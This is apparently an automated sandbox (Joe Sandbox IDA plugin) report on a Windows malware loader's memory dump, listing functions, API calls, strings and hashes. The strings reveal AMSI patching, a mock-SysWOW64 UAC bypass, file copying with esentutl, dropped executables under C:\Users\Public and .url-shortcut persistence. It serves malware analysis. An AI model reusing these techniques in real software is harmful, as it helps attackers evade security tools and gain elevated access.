RtlCreateQueryDebugBuffer, xrefs: 02DBA6DD
psapi, xrefs: 02DBA9F3
EnumServicesStatusA, xrefs: 02DBA9B2
DlpNotifyPreDragDrop, xrefs: 02DBA44D
NtCreateSection, xrefs: 02DBAF4A
NtQuerySystemInformation, xrefs: 02DBA976
ntdll, xrefs: 02DB922B, 02DB927B, 02DB928F, 02DBA628, 02DBA65B, 02DBA68E, 02DBA6C1, 02DBA6F4, 02DBAE95, 02DBAEC8, 02DBAEFB, 02DBAF2E, 02DBAF61, 02DBAF94, 02DBAFC7, 02DBAFFA, 02DBB02D, 02DBB060, 02DBB093, 02DBB0C6, 02DBB0F9, 02DBB12C, 02DBB15F
LdrGetProcedureAddress, xrefs: 02DBB07C
OpenProcess, xrefs: 02DBAB72
SLGatherMigrationBlob, xrefs: 02DBAE18
CryptSIPVerifyIndirectData, xrefs: 02DBA17B
EnumServicesStatusExW, xrefs: 02DBA9DF
MiniDumpReadDumpStream, xrefs: 02DB9262
EtwEventWrite, xrefs: 02DBB148
UacInitialize, xrefs: 02DB912F, 02DB954B
NtOpenFile, xrefs: 02DBB0E2
DllGetClassObject, xrefs: 02DBA115, 02DBADE5
advapi32, xrefs: 02DB923F
C:\Windows\System32\, xrefs: 02DB86B3
NtDeviceIoControlFile, xrefs: 02DBA985
bcrypt, xrefs: 02DBA2BD
ScanString, xrefs: 02DB822C, 02DB8498, 02DB8F3F, 02DB9331, 02DB971A, 02DB9AFB, 02DB9DF9, 02DBA1B4, 02DBA59B, 02DBA792, 02DBAD3C
FlushInstructionCache, xrefs: 02DBABD8
DlpGetArchiveFileTraceInfo, xrefs: 02DBA4B3
DlpCheckIsCloudSyncApp, xrefs: 02DBA480
Kernel32, xrefs: 02DBAA02, 02DBAA11, 02DBAA4D
NtMapViewOfSection, xrefs: 02DBAF7D
RetailTracerEnable, xrefs: 02DBA0AF
CreateProcessAsUserW, xrefs: 02DBAA2A, 02DBAA48
GetProcessMemoryInfo, xrefs: 02DBA148
NtQuerySecurityObject, xrefs: 02DBAFE3
DlpGetWebSiteAccess, xrefs: 02DBA4E6
ScanBuffer, xrefs: 02DB8529, 02DB87F6, 02DB899C, 02DB8B29, 02DB8CBD, 02DB8E3C, 02DB90B3, 02DB91AB, 02DB95C7, 02DB98A0, 02DB9A39, 02DB9C6F, 02DB9D01, 02DBA039, 02DBA3D7, 02DBA906, 02DBB20C
endpointdlp, xrefs: 02DBA464, 02DBA497, 02DBA4CA, 02DBA4FD
sppwmi, xrefs: 02DBADFC
I_QueryTagInformation, xrefs: 02DB923A
spp, xrefs: 02DBA0F9, 02DBA12C, 02DBADC9
SLGetEncryptedPIDEx, xrefs: 02DBAE4B
LdrLoadDll, xrefs: 02DBB049
SLIsGenuineLocalEx, xrefs: 02DB9ED5
RtlQueryProcessDebugInformation, xrefs: 02DBA9A3
NtWriteVirtualMemory, xrefs: 02DBB0AF
NtQueryDirectoryFile, xrefs: 02DBA994
NtGetWriteWatch, xrefs: 02DBAE7E
NtQueryInformationThread, xrefs: 02DBAEE4
NtReadVirtualMemory, xrefs: 02DBAFB0
psapi, xrefs: 02DBA15F
CreateProcessW, xrefs: 02DBAA0C
MiniDumpWriteDump, xrefs: 02DB924E
NtOpenSection, xrefs: 02DBAF17
EnumServicesStatusExA, xrefs: 02DBA9D0
OpenSession, xrefs: 02DB8134, 02DB82A8, 02DB8324, 02DB8621, 02DB877A, 02DB8920, 02DB8AAD, 02DB8C41, 02DB8DC0, 02DB8EC3, 02DB9037, 02DB92B5, 02DB94A5, 02DB9796, 02DB991C, 02DB9B77, 02DB9D7D, 02DB9F41, 02DBA230, 02DBA2DF, 02DBA51F, 02DBA716, 02DBA80E, 02DBACC0, 02DBB288
Initialize, xrefs: 02DB81B0, 02DB83A0, 02DB93AD, 02DB9FBD, 02DBA35B, 02DBA88A, 02DBAC44, 02DBB190
NtOpenProcess, xrefs: 02DB928A
VirtualAlloc, xrefs: 02DBAAD9
BCryptVerifySignature, xrefs: 02DBA2A6
SLGetSLIDList, xrefs: 02DB9EA2
Advapi, xrefs: 02DBA9B7, 02DBA9C6, 02DBA9D5, 02DBA9E4, 02DBAA20, 02DBAA2F, 02DBAA3E
mssip32, xrefs: 02DBA192
EnumProcessModules, xrefs: 02DBA9EE
tquery, xrefs: 02DBA0C6
NtWaitForSingleObject, xrefs: 02DBA677
EtwEventWriteEx, xrefs: 02DBB115
NtOpenObjectAuditAlarm, xrefs: 02DB9226
MZP, xrefs: 02DB9992
CreateProcessAsUserA, xrefs: 02DBAA1B
NtQueryVirtualMemory, xrefs: 02DBAEB1
RtlAllocateHeap, xrefs: 02DBA644, 02DBA6AA
NtAccessCheck, xrefs: 02DBB016
VirtualAllocEx, xrefs: 02DBAB0C
sppc, xrefs: 02DB9E86, 02DB9EB9, 02DB9EEC, 02DB9F1F, 02DBAE2F, 02DBAE62
CreateProcessA, xrefs: 02DBA9FD
SetUnhandledExceptionFilter, xrefs: 02DBAC0B
CreateProcessWithLogonW, xrefs: 02DBAA39
WriteVirtualMemory, xrefs: 02DBABA5
SxTracerGetThreadContextDebug, xrefs: 02DBA0E2, 02DBADB2
SLGetGenuineInformation, xrefs: 02DB9E6F
dbgcore, xrefs: 02DB9253, 02DB9267
NtSetSecurityObject, xrefs: 02DB9276
VirtualProtect, xrefs: 02DBAB3F
kernel32, xrefs: 02DBAAF0, 02DBAB23, 02DBAB56, 02DBAB89, 02DBABBC, 02DBABEF, 02DBAC22
Ntdll, xrefs: 02DBA97B, 02DBA98A, 02DBA999, 02DBA9A8

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2769005614-3738268246
Opcode ID: c05b1bf2c0c4928d371fdd775e36fc0887a7056a8f4695a6c8026ac495392b63
Instruction ID: 8f77da6e155d744b8134e1c6acc4e166267ae7c6c86e5aa2bcdbf9ea6a3033d7
Opcode Fuzzy Hash: c05b1bf2c0c4928d371fdd775e36fc0887a7056a8f4695a6c8026ac495392b63
Instruction Fuzzy Hash: D143EA75A0015CDFDF21EB64DC909CE73BAFF89304F5041E6A40AAB715DA30AE968F61

Function 02DB3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

Part of subcall function 02DADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADD5E), ref: 02DADCCB
Part of subcall function 02DADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DADD05
Part of subcall function 02DADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DADD32
Part of subcall function 02DADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DADD3B

Sleep.KERNEL32(000003E8,ScanBuffer,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,02DBBB30,00000000,00000000,02DBBB24,00000000,00000000), ref: 02DB40CB

Part of subcall function 02DA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02DA88C1
Part of subcall function 02DA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DA8920

Sleep.KERNEL32(000003E8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,000003E8,ScanBuffer,02E17380,02DBB7B8,UacScan,02E17380), ref: 02DB4277

Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6

Sleep.KERNEL32(00004E20,UacScan,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacInitialize,02E17380,02DBB7B8), ref: 02DB50EE

Part of subcall function 02DADC04: RtlI.N(?,?,00000000,02DADC7E), ref: 02DADC2C
Part of subcall function 02DADC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC42
Part of subcall function 02DADC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC61

Part of subcall function 02D97E5C: GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67

Part of subcall function 02DA85BC: WinExec.KERNEL32(?,?), ref: 02DA8624

Strings

UacScan, xrefs: 02DB3F7F, 02DB40DC, 02DB4288, 02DB440B, 02DB45DC, 02DB46BA, 02DB484F, 02DB4D10, 02DB5079, 02DB53F3, 02DB5B8F, 02DB60FF, 02DB62C4, 02DB65EA, 02DB66F7, 02DB6955, 02DB6A4D
C:\Users\Public\CApha.exe, xrefs: 02DB5500
HotKey=, xrefs: 02DB6EE1
C:\\Windows \\SysWOW64\\, xrefs: 02DB4822
C:\Users\Public\alpha.exe, xrefs: 02DB54E5
OpenSession, xrefs: 02DB4158, 02DB4304, 02DB4487, 02DB48CB, 02DB4AC0, 02DB4C18, 02DB4F00, 02DB517B, 02DB52FB, 02DB5634, 02DB57CE, 02DB596E, 02DB5B13, 02DB5C87, 02DB5ED7, 02DB5F8B, 02DB6248, 02DB6340, 02DB67EF, 02DB6AC9, 02DB6C3D, 02DB6DD3, 02DB6F83
Initialize, xrefs: 02DB5876, 02DB5C0B, 02DB6007, 02DB61CC, 02DB6438, 02DB656E, 02DB6773
C:\Users\Public\pha.exe, xrefs: 02DB551B
/d , xrefs: 02DB64B5
ScanBuffer, xrefs: 02DB3FFB, 02DB4202, 02DB4380, 02DB4503, 02DB457F, 02DB4736, 02DB4947, 02DB4B3C, 02DB4D8C, 02DB4F7C, 02DB51F7, 02DB546F, 02DB56B0, 02DB59EA, 02DB5D03, 02DB6083, 02DB63BC, 02DB6666, 02DB686B, 02DB69D1, 02DB6B45, 02DB6BC1
C:\\Windows \\SysWOW64\\per.exe, xrefs: 02DB43F5
C:\Users\Public\, xrefs: 02DB5D88, 02DB6FF3
[InternetShortcut], xrefs: 02DB6D48
UacInitialize, xrefs: 02DB4A44, 02DB4E84, 02DB50FF, 02DB553C, 02DB58F2, 02DB5DDF
lld.SLITUTEN, xrefs: 02DB480C
IconIndex=, xrefs: 02DB6DAD
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02DB64AA
C:\\Users\\Public\\Libraries\\, xrefs: 02DB616F
URL=file:", xrefs: 02DB6D57
.url, xrefs: 02DB5D93
UacUninitialize, xrefs: 02DB3E1E, 02DB463E, 02DB4C94, 02DB5377
/o, xrefs: 02DB64C0
ScanString, xrefs: 02DB3F03, 02DB49C8, 02DB4E08, 02DB4FFD, 02DB55B8, 02DB5752, 02DB5A97, 02DB5E5B, 02DB64F2, 02DB6CD8, 02DB6E4F, 02DB6F07

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 2171786310-3926298568
Opcode ID: 98a1256599eb019ceab753adad2fbdeaea345acb534cf2514b4cc25cb01ab90e
Instruction ID: 502b9a8d99e43e62eae28f1d9a8749281bd5058f743a7e1c669ddc359a9d8a58
Opcode Fuzzy Hash: 98a1256599eb019ceab753adad2fbdeaea345acb534cf2514b4cc25cb01ab90e
Instruction Fuzzy Hash: EB431835A4025C9FDF21EB64DC90EDE73B6FF89304F5041E6A409AB715CA30AE868F61

Function 02DAE678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

Part of subcall function 02DA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814

Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02E17380,02DAEF4C,OpenSession,02E17380,02DAEF4C,UacScan,02E17380,02DAEF4C,ScanBuffer,02E17380,02DAEF4C,OpenSession,02E17380), ref: 02DAED6E
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02E17380,02DAEF4C,OpenSession,02E17380,02DAEF4C,UacScan,02E17380,02DAEF4C,ScanBuffer,02E17380,02DAEF4C,OpenSession), ref: 02DAED76
CloseHandle.KERNEL32(00000870,00000000,00000000,000000FF,ScanString,02E17380,02DAEF4C,OpenSession,02E17380,02DAEF4C,UacScan,02E17380,02DAEF4C,ScanBuffer,02E17380,02DAEF4C), ref: 02DAED7F

Strings

ScanString, xrefs: 02DAE76A, 02DAE90F, 02DAEAD7, 02DAECFF
)"C:\Users\Public\Libraries\lxsyrsiW.cmd" , xrefs: 02DAE7F1, 02DAE9B3
NtSetSecurityObject, xrefs: 02DAEEC0
Initialize, xrefs: 02DAEB48, 02DAED8B
ntdll, xrefs: 02DAEEC5, 02DAEED6
NtOpenProcess, xrefs: 02DAEED1
Amsi, xrefs: 02DAE825
UacScan, xrefs: 02DAE6B8, 02DAE85D, 02DAE9F5, 02DAEC35, 02DAEE78
OpenSession, xrefs: 02DAE711, 02DAE8B6, 02DAEA66, 02DAEB97, 02DAEC8E, 02DAEDDA
ScanBuffer, xrefs: 02DAEBE6, 02DAEE29
AmsiOpenSession, xrefs: 02DAE814

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 3475578485-1053911981
Opcode ID: 3a2ffb623bd17301f5bea1fa3dbeba153719c74835a5dcd749a6512f6cb0a1e1
Instruction ID: 9efac59e9d14dc5bb8636f99ae115b07da0a2d3778c8898243c25efff7f28991
Opcode Fuzzy Hash: 3a2ffb623bd17301f5bea1fa3dbeba153719c74835a5dcd749a6512f6cb0a1e1
Instruction Fuzzy Hash: A622D735A0015D9FEF10EBA4D891FCEB3BAEF85304F5041A5A409AB355DB30AE46CF66

Function 02D91724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02D92000), ref: 02D917D0
Sleep.KERNEL32(0000000A,00000000,?,02D92000), ref: 02D917E6

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 649f0179f37311b7d03ab4f2874f66ad9b08b356d3c1640e3213689a23848f01
Instruction ID: b3e137b0220a6332c216582ee5bf7fc0d841b42ee1589204c80567730bcfee17
Opcode Fuzzy Hash: 649f0179f37311b7d03ab4f2874f66ad9b08b356d3c1640e3213689a23848f01
Instruction Fuzzy Hash: D1B111B2A402528FCF16CF29D884355BBE1EF86315F5986BAE4598B3C5C770DC91CBA0

Function 02DA88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02DA88C1

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DA8920

Strings

DllGetClassObject, xrefs: 02DA88E6
amsi, xrefs: 02DA88BC
W, xrefs: 02DA88CD

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: bbb517804a211cc1f3cdea4ddeeb4c03e31a4984d08dee6a9968a66eb658bbcf
Instruction ID: 4c8c00b96a1abb8291488a0affc4c106a31fab80c16cff38fe97a3e18de2ad98
Opcode Fuzzy Hash: bbb517804a211cc1f3cdea4ddeeb4c03e31a4984d08dee6a9968a66eb658bbcf
Instruction Fuzzy Hash: 05F0AF6154C381BAE700E3748C59F4FBECD8B62264F008A58F1E8AA3D2D679D5059BB7

Function 02D91A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?), ref: 02D91B17
Sleep.KERNEL32(0000000A,00000000,?), ref: 02D91B31

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0fc7d9fdd3baca524b9834a44564930ad22083456d2786db29a5011eafb2f407
Instruction ID: ab8d8780649605aa0118af68ea9ab2381d1f7aabd85872230fb9b93218304263
Opcode Fuzzy Hash: 0fc7d9fdd3baca524b9834a44564930ad22083456d2786db29a5011eafb2f407
Instruction Fuzzy Hash: 2951DE716452428FDF16DF68C984766BBE1EF46318F5885AEE4488B3C2E770CC85CBA1

Function 02DAE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DAE5F6

Strings

ScanBuffer, xrefs: 02DAE53F
OpenSession, xrefs: 02DAE598
Initialize, xrefs: 02DAE4E6

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: bc8efc7a66d77190942c1c649c9aba2946349221d11cb6fe77b3e02439f03c0e
Instruction ID: 9defdbcbb801e93cb19bdb844b2fb2bbb873a6554cad06d711ad1aeaf05fb3bc
Opcode Fuzzy Hash: bc8efc7a66d77190942c1c649c9aba2946349221d11cb6fe77b3e02439f03c0e
Instruction Fuzzy Hash: 3F412A35A10148AFEF10EBA8D850EDEB3BAEF88704F604835F041A7352DA74AD06CF65

Function 02DA8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814

Strings

CreateProcessAsUserW, xrefs: 02DA87A1
Kernel32, xrefs: 02DA87D3

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: e5e3f140b68d1b79469f0d0df75a2f8707ac04df2f05902bf5aafd074c54de45
Instruction ID: 3c39ab46b5551adef8d681d43b57b44f86e2acf9e71319207ecc6b0f78af7e0b
Opcode Fuzzy Hash: e5e3f140b68d1b79469f0d0df75a2f8707ac04df2f05902bf5aafd074c54de45
